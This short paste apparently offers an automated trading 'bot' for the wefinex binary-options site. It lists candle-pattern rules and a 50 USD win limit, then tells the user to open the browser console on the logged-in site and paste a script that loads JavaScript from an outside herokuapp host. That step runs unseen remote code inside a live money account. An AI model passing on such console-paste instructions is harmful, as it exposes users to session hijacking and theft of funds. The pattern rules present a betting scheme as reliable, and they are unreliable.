
FLow rule

[
"xxdd->0",
"ddxxdd->0",
"ddxx->0",
"xxddxx->0",
"xxd->0",
"ddx->0",
"dxx->0",
"xdd->0",

"xxx->x",
"xxxd->x",
"xxxxd->x",

"xxxdxxd->x",
"dxd->x",
"dxxxx->x",
"dddddd->x",

"xdx->d",
"ddd->d",
"dddx->d",
"ddddx->d",


"dddxddx->d",
"xdddd->d",
"xxxxxx->d"
];


Limit win 50 usd will stop trade.



Open web
Goto wefinex
F12/Right Click ->Inspect
Pase here to console


var fileref=document.createElement('script')
fileref.setAttribute("type","text/javascript")
fileref.setAttribute("src", "https://tranquil-fjord-14350.herokuapp.com/version/v2/release.js")
document.getElementsByTagName("head")[0].appendChild(fileref)
